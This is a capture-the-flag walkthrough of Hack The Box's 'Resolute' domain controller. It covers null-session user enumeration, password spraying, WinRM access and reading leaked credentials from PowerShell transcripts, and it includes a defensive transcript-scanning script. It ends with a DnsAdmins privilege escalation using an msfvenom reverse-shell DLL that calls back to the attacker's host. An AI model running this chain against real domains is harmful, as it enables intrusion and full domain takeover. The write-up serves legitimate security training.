Resolute HTB

Resolute is a machine from Hack The Box: a ready-made environment for penetration-testing practice.

On board: a domain controller running Windows Server 2016.

We start by checking exposed services and open ports with:

nmap -sC -sV -oA resolute 10.10.10.169

 

Nmap scan report for 10.10.10.169
Host is up (0.083s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-04-08 08:07:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h26m29s, deviation: 4h02m31s, median: 6m28s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2021-04-08T01:07:27-07:00
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-04-08T08:07:25
|_ start_date: 2021-04-08T07:53:57

The port set (DNS, Kerberos, LDAP/LDAPS, the global catalog on 3268/3269, SMB) confirms a domain controller for megabank.local. Two details worth noting for later: SMB signing is required, so NTLM relay against this host is off the table, and the clock skew of roughly 6 minutes will matter if we use Kerberos-based tooling, because the KDC rejects requests more than 5 minutes off its own time. Over MS-RPC (SMB named pipes) we can ask the DC for its users. This can be done by hand with rpcclient

https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf or automatically with enum4linux, which ships with Kali Linux https://tools.kali.org/information-gathering/enum4linux

Result

We get the organization's password policy and a user's password, stored in plain text in the account's description attribute in AD 🙂 (this really does happen in the wild). Note that the whole thing was obtained over a null session, without any credentials.

Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!

 ==================================================== 
|    Password Policy Information for 10.10.10.169    |
 ==================================================== 

[+] Attaching to 10.10.10.169 using a NULL share

[+] Trying protocol 139/SMB…

[!] Protocol failed: Cannot request session (Called Name:10.10.10.169)
[+] Trying protocol 445/SMB…

[+] Found domain(s):

[+] MEGABANK
[+] Builtin
[+] Password Info for Domain: MEGABANK

[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

    [+] Domain Refuse Password Change: 0
    [+] Domain Password Store Cleartext: 0
    [+] Domain Password Lockout Admins: 0
    [+] Domain Password No Clear Change: 0
    [+] Domain Password No Anon Change: 0
    [+] Domain Password Complex: 0

[+] Minimum password age: 1 day 4 minutes 
[+] Reset Account Lockout Counter: 30 minutes 
[+] Locked Account Duration: 30 minutes 
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7

=============================
| Users on 10.10.10.169 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)

With marko's login and the password from his description we would expect to log straight in over WinRM. In practice Welcome123! no longer works for marko himself, but the policy above has no lockout threshold, so we can safely spray that one password across the whole user list; it turns out melanie reused it. With her account we can log in over WinRM.

WinRM is Windows' remote management protocol (PowerShell remoting over HTTP on 5985 or HTTPS on 5986), present on every modern Windows host and enabled by default on servers; it is worth scanning those two ports explicitly because the default nmap port set above does not show them. To get a shell through it a user must be an administrator or a member of Remote Management Users.

On our Linux box we run:

evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

Evil-WinRM PS C:\Users\melanie\Documents>

Interestingly, a PSTranscripts directory sits in the root of C:\ (hidden, so it only shows up with ls -force) and every user can read it.

PowerShell transcription is a logging feature: when enabled by policy it writes a full record of each PowerShell session (every command and its output) to a configured directory, here C:\PSTranscripts. It is a different thing from the PSReadLine command history, which every interactive PowerShell user has by default at

%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Both are worth reading. If, as in this case, someone types a password in clear text into PowerShell, the file becomes extremely sensitive, and a transcript directory readable by everyone turns a security control into a credential store.

 

Evil-WinRM* PS C:\PSTranscripts> cd 20191203
Evil-WinRM PS C:\PSTranscripts\20191203> ls
Evil-WinRM PS C:\PSTranscripts\20191203> ls -force

Directory: C:\PSTranscripts\20191203

Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

Evil-WinRM PS C:\PSTranscripts\20191203> cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt


Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1


Command start time: 20191203063455


PS>TerminatingError(): "System error."

CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
CommandInvocation(Out-String): "Out-String"
ParameterBinding(Out-String): name="Stream"; value="True"


Command start time: 20191203063455


PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>


Command start time: 20191203063515


PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \fs01\backups ryan Serv3r4Admin4cc123!

We've caught another one 🙂 ryan mapped a share with his own password in the command line, and the transcript kept it.

As it turns out, ryan is a member of the DNS administrators group (DnsAdmins).

We can check this with whoami /all
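Reading transcripts by eye works for one file; a day's worth of C:\PSTranscripts does not. The scanner below is an added example, not part of the original write-up: it pulls who ran the session out of the transcript header, then flags lines that carry a cleartext credential (net use with a password on the command line, -Password arguments, ConvertTo-SecureString with a literal). SAMPLE_TRANSCRIPT is a constructed excerpt of the transcript above, and the credential patterns are my own heuristics, not an exhaustive list.

```python
"""Scan PowerShell transcript files (the C:\PSTranscripts kind) for commands that
carry cleartext credentials, and report which user ran them.

Added example, not part of the original write-up. SAMPLE_TRANSCRIPT is a
constructed excerpt of the transcript shown in the post; the credential
patterns below are assumptions about what is worth reporting.
"""
import re
import sys
from pathlib import Path

HEADER_RE = re.compile(r"^(Username|RunAs User|Machine|Start time):\s*(.+)$", re.M)
# net use <drive> <\\server\share> <password> [/user:name]   (password position is what we care about)
NET_USE_RE = re.compile(
    r"\bnet\s+use\s+(?:(?P<drive>[A-Za-z]:|\*)\s+)?(?P<path>\\\\?\S+)\s+(?P<rest>.+)$", re.I)
GENERIC_RES = (
    re.compile(r"(?:-Password|--password|/password)[\s:=]+['\"]?(?P<secret>[^'\"\s]+)", re.I),
    re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?['\"]?(?P<secret>[^'\"\s]+)", re.I),
)

SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
**********************
Command start time: 20191203063455
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!"
"""


def parse_header(text):
    """The 'key: value' lines PowerShell writes at the top of every transcript."""
    return {k: v.strip() for k, v in HEADER_RE.findall(text)}


def find_credentials(text):
    """[(line_no, kind, user, secret)] for every line that looks like it carries a password."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip().rstrip('"')          # transcripts quote the command text
        m = NET_USE_RE.search(line)
        if m:
            toks = [t.strip("\"'") for t in m.group("rest").split()]
            switches = [t for t in toks if t.startswith("/")]
            plain = [t for t in toks if not t.startswith("/")]
            if plain and plain[-1] != "*":      # '*' means 'prompt for password', nothing leaked
                user = next((s.split(":", 1)[1] for s in switches if s.lower().startswith("/user:")), None)
                if user is None and len(plain) >= 2:
                    user = plain[-2]            # 'net use X: \\srv\share user pass' as in the transcript
                findings.append((no, "net use", user, plain[-1]))
            continue
        for rx in GENERIC_RES:
            g = rx.search(line)
            if g and not g.group("secret").startswith("-"):
                findings.append((no, "password argument", None, g.group("secret")))
                break
    return findings


def scan_transcript(text):
    hdr = parse_header(text)
    return {"user": hdr.get("RunAs User") or hdr.get("Username"),
            "machine": hdr.get("Machine"), "start": hdr.get("Start time"),
            "findings": find_credentials(text)}


def scan_directory(root):
    """Walk a PSTranscripts-style tree (one sub-folder per day) and scan every transcript."""
    return {str(p): scan_transcript(p.read_text(encoding="utf-8-sig", errors="replace"))
            for p in Path(root).rglob("PowerShell_transcript.*.txt")}


if __name__ == "__main__":
    # usage: python scan_transcripts.py C:\PSTranscripts   (falls back to the embedded sample)
    results = scan_directory(sys.argv[1]) if len(sys.argv) > 1 else {"<sample>": scan_transcript(SAMPLE_TRANSCRIPT)}
    for path, r in results.items():
        for no, kind, user, secret in r["findings"]:
            print(f"{path}:{no} [{kind}] session={r['user']} user={user} secret={secret}")
```

Run it against a copied-out transcript directory and it gives you, per file, the session owner and every leaked secret; on the defensive side the same scanner is a cheap control to run over the transcript share before an attacker does.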

Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION

User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105

GROUP INFORMATION

Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192

PRIVILEGES INFORMATION

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

 

OK, but what can a member of DnsAdmins actually do? Among other things, they can configure the DNS server to load a "plugin" DLL of their choosing (the ServerLevelPluginDll setting) and restart the service. On a domain controller the DNS service runs as SYSTEM, so the DLL runs as SYSTEM too, which hands us the server 🙂

First we prepare the DLL the DNS service will load; msfvenom will do:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.16 LPORT=4444 --platform=windows -f dll > exploit.dll

We serve this file from an SMB share on our box with impacket's smbserver.py (Server 2016 still lets the DNS service fetch it from an anonymous share; on newer Windows builds guest access is blocked by default, so add -smb2support plus -username/-password and use those credentials in the UNC path):

python3 /usr/share/doc/python3-impacket/examples/smbserver.py SHARE /root/HTB/Boxes/Resolute

Then we start a netcat listener on port 4444 🙂

the command

nc -lvnp 4444

From the DnsAdmins account (ryan's evil-winrm session) we point the DNS service at our DLL:

dnscmd.exe /config /serverlevelplugindll \\10.10.14.16\SHARE\exploit.dll

and then restart the service, because the plugin is only loaded at service start. Note that inside PowerShell sc is an alias of Set-Content, so call the binary explicitly:

sc.exe stop dns

sc.exe start dns

When dns.exe starts, it loads our DLL and the reverse shell comes back as NT AUTHORITY\SYSTEM. Two caveats: the DNS service does not start cleanly with a DLL that is not a real plugin, so the domain's name resolution is down and the shell may not live long; and this is a destructive change on a production DC, so on a real engagement agree on it first and clean up afterwards by deleting the value (reg delete HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll) and restarting DNS again.

 

A description of how the dnscmd privilege escalation works:

https://www.abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/

 

 

 
